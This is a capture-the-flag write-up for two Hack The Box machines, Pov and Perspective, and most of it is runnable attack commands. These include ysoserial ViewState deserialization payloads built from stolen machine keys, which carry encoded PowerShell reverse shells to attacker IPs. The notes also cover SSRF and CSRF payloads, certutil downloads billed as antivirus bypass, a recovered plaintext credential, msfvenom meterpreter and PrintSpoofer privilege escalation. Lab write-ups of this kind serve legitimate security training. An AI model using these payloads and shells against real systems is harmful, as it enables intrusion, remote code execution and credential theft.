[TOC]
# LAB-1: Sub-domain / Path Traversal -> Download web.config / Insesurity Deserialization - viewstate ASP.NET / Powershell credential Cracking / runas.exe / seDebugPrivilge abusing
https://app.hackthebox.com/machines/585
## Recon
```=
ATTACKER_INTERFACE="tun3"
TARGET_IP=10.10.11.251
ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1)
```
```
TARGET_DOMAIN='pov.htb'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```
## Enumerate Attack surfaces
### SubDomain
```
wfuzz -u http://$TARGET_IP -H "Host: FUZZ.$TARGET_DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 834
```
```
echo "$TARGET_IP dev.$TARGET_DOMAIN" >> /etc/hosts
```
## Identify & Exploit Vulnerabilities
### ASP.NET __VIEWSTATE
__VIEWSTATE is used to management page and control data cross the web page, During the rendering of a page HTML.
[Exploit - Reference](https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter?source=post_page-----7516c938c688--------------------------------#test-case-3-.net-less-than-4.5-and-enableviewstatemac-true-false-and-viewstateencryptionmode-true)
### Case
EnableViewStateMac = True/False (?)
ViewStateEncryptionMode = True
We need machine key to inject object chine to invoke systems call
Machine key typically was stored in web.conf
we need to find the endpoint to do path traversal to steal web.conf
### Find out web.config
Fuzzing Sensitive FIle
```
ffuf -request-proto http -request reqm.txt -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -fs 168
```
```
default.aspx
Default.aspx
contact.aspx
Contact.aspx
cv.pdf
index.aspx.cs
Contact.aspx.cs
Index.aspx.cs
contact.aspx.cs
```
Testing /web.conf
```
ffuf -request-proto http -request reqm1.txt -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -fs 168
```
Very lucky, developer didn't ViewStateUserKey setting !
Machine Keys
```
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
```
## Exploit (ysoserial.exe )
Basic .Net Deserialization
Construct Object chain via ysoserial.exe
Modify
- path
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://10.10.14.15:80/$env:UserName" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```
Work
### Base 64 powershell to RCE
Reverse Power shell
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
```
## Privilege to Normal User
Cracking Power shell automatically connection Credential !
```
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6
```
```
$EncryptedString = Get-Content .\pass.txt
$SecureString = ConvertTo-SecureString $EncryptedString
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString
echo $Credential.GetNetworkCredential().password
```
```
$username = 'alaading'
$password = 'f8gQ8fynP44ek1m3'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object Automation.PSCredential($username, $securePassword)
Invoke-Command -ComputerName localHost -Credential $credential -ScriptBlock{powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.15', 9000);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"}
```
Work
### Runas.exe (Local privilege to normal user)
Download Runas (Anti-virus Bypass)
```
certutil.exe -urlcache -split -f "http://10.10.14.15:80/RunasCs.exe" ".\RunasCs.exe"
```
```
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.15:53
```
## Privilege to root user
### Enable seDebugPrivilge (psgetsys.ps1,EnableAllTokenPrivs.ps1)
```
certutil.exe -urlcache -split -f "http://10.10.14.15:80/psgetsys.ps1" ".\psgetsys.ps1"
certutil.exe -urlcache -split -f "http://10.10.14.15:80/EnableAllTokenPrivs.ps1" ".\EnableAllTokenPrivs.ps1"
```
Run Script in Powershell
Powershell
```
.\psgetsys.ps1
.\EnableAllTokenPrivs.ps1
```
Upload meterpreter shell to Target systems for migrate cmd to admin process !
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun3 LPORT=8988 -f exe > rev_mete_shell.exe
```
```
certutil.exe -urlcache -split -f "http://10.10.14.15:80/rev_mete_shell.exe" ".\rev_mete_shell.exe"
```
```
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.14.15 ; set LPORT 8988"
```
# LAB-2: / Reset Password logic flaw/web.config leak via File upload, shtml/ SSRF - Access Sensitive Decrypt endpoint / deserialization - viewstate ASP.NET
https://app.hackthebox.com/machines/Perspective
## Recon
```
ATTACKER_INTERFACE="tun0"
TARGET_IP=10.10.11.151
ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1)
```
Domain Name -> http://perspective.htb/
```
TARGET_DOMAIN='perspective.htb'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```
## Identify / Exploit vulnerabilities
Register Account
Forget The Password
Support
-> Admin Username
```
admin@perspective.htb
```
## Password Reset logic flaw to Admin
Website will check first step password reset
When we want to reset the password /Account/Forgot will stop us action
```
POST /Account/Forgot (Admin not be allowed!)
POST /handlers/changePassword.ashx
```
Developer didn't check emailhidder parameter
-> It allow attacker arbitrary specify user to reset password
Reset Password
```
Adminmeow@
```
Query All user product
Viewstate -> Probably contain Deserialize vulnerability !
## File upload to steal sensitive file (shtml,shtm)
We need to steal web.config
### Upload bypass
- Content-Type:
- Extension Name /FileName Control ?
- Magic String
- HTTP Verb
Content-Type filter Detectived !
Extension Name filter Detectived !
Check Extension is blacklist .
Attempt upload file to steal sensitive file.
### Fuzzing valid Extension
```
ffuf -request-proto http -request req -w /usr/share/seclists/Fuzzing/extensions-most-common.fuzz.txt
```
### shtm,shtml include web.config
shtm.shtml ->server side include (they are extension of html that allow dynamic include the file and embedding it on page )
We can attempt construct the malicious shtm,shtml to include sensitive file.
Attempting
steal.config
```
<!--#include file="/web.config" -->
```
Machine Key we get
Analysis web.config
```
<machineKey compatibilityMode="Framework20SP2" validation="SHA1" decryption="AES" validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" />
```
### ViewStateUserKey Exists !
Website have ViewStateUserKey setting to protected the Deserialization attack
```
<appSettings>
<add key="environment" value="Production" />
<add key="Domain" value="perspective.htb" />
<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
<add key="SecurePasswordServiceUrl" value="http://localhost:8000" />
</appSettings>
```
we have to find a way to decrypt "ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==""
we also discover the sensitive port -> 8000
```
http://localhost:8000
```
## SSRF to access Sensitive API endpoint
SSRF to enumerate internal Port
Testing Filter
```
test<
```
Description allow to using '<'
### Image tags Attempt
```
<img src=http://10.10.14.15></img>
```
### meta tags Attempt
Filter Bypass
```
<meta http-equiv="refresh" content="0; url=http://10.10.14.15">
```
### SSRF - Exploit (API endpoint Analysis)
```
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000">
```
It will return the response via xml (we have to use source code to look at)
Insert payload to Access sensitive Endpoint
```
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000/swagger/v1/swagger.json">
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000/encrypt">
<meta http-equiv="refresh" content="0; url=http://127.0.0.1:8000/decrypt">
```
Reading Document
/swagger/v1/swagger.json
https://swagger.io/specification/
Using Endpoint via SSRF
To do this, we cat let server to fetch our website and perform CSRF Attack to Using sensitive endpoint
Goal
->Decrypt -> ViewStateUserKey
```
<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
```
`enc1:3UVxtz9jwPJWRvjdl1PfqXZTgg==`
### Via javascript to passing parameter (Decrypt viewstateuserkey)
/encrypt?plaintext=meowhecker
```
<meta http-equiv="refresh" content="0; url=http://10.10.14.5/csrf1.html">
```
```htmlembedded=
<html>
<body>
<form action="http://127.0.0.1:8000/encrypt" method="GET">
<input type="hidden" name="plaintext" value="meowhecker" />
</form>
<script>
document.write("meow Paylod was triipped")
document.forms[0].submit();
</script>
</body>
</html>
```
meowhecker
```
enc1:42FytC514vVHbQ==
```
It look like ViewStateUserKey
`<add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />`
/decrypt?cipherTextRaw
```
<meta http-equiv="refresh" content="0; url=http://10.10.14.5/csrf2.html">
```
Alternate Payload
```
<html>
<body>
<form method="post" action="http://127.0.0.1:8000/decrypt?cipherTextRaw=enc1:vnx5pQ%3d%3d"></form>
<script>
document.write("meow Paylod was triipped")
document.forms[0].submit();
</script>
</body>
</html>
```
Key
```
SAltysAltYV1ewSTaT3
```
## RCE Via Deserialization
```
<machineKey compatibilityMode="Framework20SP2" validation="SHA1" decryption="AES" validationKey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF" decryptionKey="B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9" />
```
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe Invoke-WebRequest -Uri http://10.10.14.5/$env:UserName" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.5" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
Listener - Interface
sudo tcpdump -ni tun0 icmp
RCE (Windows Powershell)
### Reverse PowerShell (Base64)
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --generator=90AA2C29 --decryptionalg=AES --decryptionkey=B16DA07AB71AB84143A037BCDD6CFB42B9C34099785C10F9 --validationalg=SHA1 --validationkey=99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF --viewstateuserkey=SAltysAltYV1ewSTaT3
```
https://github.com/itm4n/PrintSpoofer
http://10.10.14.5:80/PrintSpoofer64.exe
Download Bypass
```
certutil.exe -urlcache -split -f "http://10.10.14.5:80/PrintSpoofer64.exe" ".\PrintSpoofer64.exe"
```
Sign in with Wallet
Connect another wallet